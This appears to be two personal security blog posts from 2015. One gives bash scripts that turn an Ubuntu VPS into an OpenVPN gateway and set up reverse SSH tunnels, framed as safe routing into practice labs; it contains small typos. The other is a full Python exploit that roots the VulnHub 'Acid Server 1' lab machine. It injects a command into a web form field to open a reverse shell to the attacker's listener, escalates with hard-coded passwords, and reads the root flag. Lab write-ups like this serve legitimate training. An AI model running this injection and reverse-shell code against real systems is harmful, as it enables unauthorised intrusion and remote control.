Tuesday, September 29, 2015

Hacking infoseclabs in peace.



There's been a lot of talk lately on the #infoseclabs channel about how to safely browse and interact with the lab.infoseclabs.net labs. I've gathered and modified a few scripts that will turn any Ubuntu VPS ( EC2, OVH, DigitalOcean) into a OpenVPN Server that will route all of your traffic through it, as well as configure SSH to allow Dynamic and Remote proxying from the VPS.  

The script to configure the server:

#!/bin/bash
###
# Allow for ssh socks proxies and port forwarding
###
sed -i.bak 's/#GatewayPorts no/GatewayPorts yes #Proxy/g' /etc/sshd_config
systemctl restartt ssh
###
# Script to set up OpenVPN for routing all traffic.
# https://github.com/tinfoil/openvpn_autoconfig
###
set -e
if [[ $EUID -ne 0 ]]; then
echo "You must be a root user" 1>&2
exit 1
fi
apt-get update -q
debconf-set-selections <<EOF
iptables-persistent iptables-persistent/autosave_v4 boolean true
iptables-persistent iptables-persistent/autosave_v6 boolean true
EOF
apt-get install -qy openvpn curl iptables-persistent
cd /etc/openvpn
# Certificate Authority
>ca-key.pem openssl genrsa 2048
>ca-csr.pem openssl req -new -key ca-key.pem -subj /CN=OpenVPN-CA/
>ca-cert.pem openssl x509 -req -in ca-csr.pem -signkey ca-key.pem -days 365
>ca-cert.srl echo 01
# Server Key & Certificate
>server-key.pem openssl genrsa 2048
>server-csr.pem openssl req -new -key server-key.pem -subj /CN=OpenVPN-Server/
>server-cert.pem openssl x509 -req -in server-csr.pem -CA ca-cert.pem -CAkey ca-key.pem -days 365
# Client Key & Certificate
>client-key.pem openssl genrsa 2048
>client-csr.pem openssl req -new -key client-key.pem -subj /CN=OpenVPN-Client/
>client-cert.pem openssl x509 -req -in client-csr.pem -CA ca-cert.pem -CAkey ca-key.pem -days 365
# Diffie hellman parameters
>dh.pem openssl dhparam 2048
chmod 600 *-key.pem
# Set up IP forwarding and NAT for iptables
>>/etc/sysctl.conf echo net.ipv4.ip_forward=1
sysctl -p
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE
>/etc/iptables/rules.v4 iptables-save
# Write configuration files for client and server
SERVER_IP=$(curl -s4 canhazip.com || echo "<insert server IP here>")
>tcp443.conf cat <<EOF
server 10.8.0.0 255.255.255.0
verb 3
duplicate-cn
key server-key.pem
ca ca-cert.pem
cert server-cert.pem
dh dh.pem
keepalive 10 120
persist-key yes
persist-tun yes
comp-lzo yes
push "dhcp-option DNS 8.8.8.8"
push "dhcp-option DNS 8.8.4.4"
# Normally, the following command is sufficient.
# However, it doesn't assign a gateway when using
# VMware guest-only networking.
#
# push "redirect-gateway def1 bypass-dhcp"
push "redirect-gateway bypass-dhcp"
push "route-metric 512"
push "route 0.0.0.0 0.0.0.0"
user nobody
group nogroup
proto tcp
port 443
dev tun443
status openvpn-status-443.log
EOF
>client.ovpn cat <<EOF
client
nobind
dev tun
redirect-gateway def1 bypass-dhcp
remote $SERVER_IP 443 tcp
comp-lzo yes
<key>
$(cat client-key.pem)
</key>
<cert>
$(cat client-cert.pem)
</cert>
<ca>
$(cat ca-cert.pem)
</ca>
EOF
service openvpn restart
cat client.ovpn
cd -

A wrapper script to easily setup reverse SSH tunnels:


#!/usr/bin/env bash
###
# Wrapper script so I don't have to remeber all of the flags
# if you want this to go smoothly use ssh-copy-id to copy your public key to the VPS
###
HOST="<Proxy IP>"
USER="root"
while getopts 'l:r:' flag; do
case $flag in
v ) verbose=true;;
l ) local_port=$OPTARG;;
r ) remote_port=$OPTARG;;
esac
done
shift $(($OPTIND-1)); OPTIND=1
usage="$(basename $0) -l <22> -r <19999>"
if [[ -z $local_port || -z $remote_port ]]; then
echo "$usage"
exit 1
fi
cmd="ssh -f -N -T -R ${remote_port}:localhost:${local_port} ${USER}@${HOST}"
trap "{ pkill -f \"$cmd\" ; exit 0 ; }" SIGINT
x=0
while true; do
((x++))
# if the ssh command isn't running, run it
[ -z "$(pgrep -f "$cmd")" ] && $cmd
sleep 30m
# kill off the ssh connection every so often
mod=$(($x%5))
if [ $mod == 0 ]; then
pkill -f "$cmd"
sleep 10
pkill -9 -f "$cmd"
sleep 10
fi
done
view raw tunnel.sh hosted with ❤ by GitHub

Friday, August 21, 2015

Everybody Loves Acid.. Acid Sever 1, of course!

I've written a script which will root a fresh version of Acid ( https://www.vulnhub.com/entry/acid-server-1,125/).  It is pretty easy to follow along and finishes with a root shell.



from urllib import urlencode
import urllib
import urllib2
import socket
import sys
import threading
import time
rhost = "192.168.12.131"
rport = 33447
lhost = "192.168.12.129"
lport = 4444
revcmd = '1;python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%d));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'' % (lhost,lport)
postfields= {
'submit' : 1337,
'IP' : revcmd,
}
url = 'http://%s:%d/Challenge/Magic_Box/low.php' % ( rhost, rport)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
def get_all_response(client):
time.sleep(.5) # delays for 1 second
recv_len = 1
response = ""
while recv_len:
data = client.recv(100)
recv_len = len(data)
response+= data
#print recv_len
if recv_len < 100:
break
print response
return response
def loop_me(client):
print "dropping into root shell"
inpt = ""
while (inpt != "exit"):
inpt = raw_input("> ")
client.send(inpt+"\n")
get_all_response(client)
def rev_hndlr():
client_sock = False
#Bind socket to local host and port
try:
s.bind((lhost, lport))
except socket.error as msg:
print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
print 'Socket bind complete'
#Start listening on socket
s.listen(10)
print 'Socket now listening'
while not client_sock:
client_sock, addr = s.accept()
print "[==>] Received incoming connection from %s:%d" % (addr[0],addr[1])
get_all_response(client_sock)
client_sock.send("python -c 'import pty;pty.spawn(\"/bin/bash\") '\n")
get_all_response(client_sock)
client_sock.send("su saman\n")
get_all_response(client_sock)
print "1337hax0r"
client_sock.send("1337hax0r\n")
get_all_response(client_sock)
client_sock.send("sudo -i\n")
get_all_response(client_sock)
client_sock.send("1337hax0r\n")
print "1337hax0r"
get_all_response(client_sock)
client_sock.send("cat /root/flag.txt\n")
get_all_response(client_sock)
loop_me(client_sock)
def main():
rev_thread = threading.Thread(target=rev_hndlr)
rev_thread.start()
params = urlencode(postfields)
print params
print 'Params encoded'
print 'URL (%s) opening with params (%s)' % (url,urllib.unquote(params).decode('utf8') )
print urllib2.urlopen(url, data=params).read()
print 'URL (%s) opened' % (url)
main()
I'll see if I can get some comments put in there later. Thanks @m_avinash143 it was fun!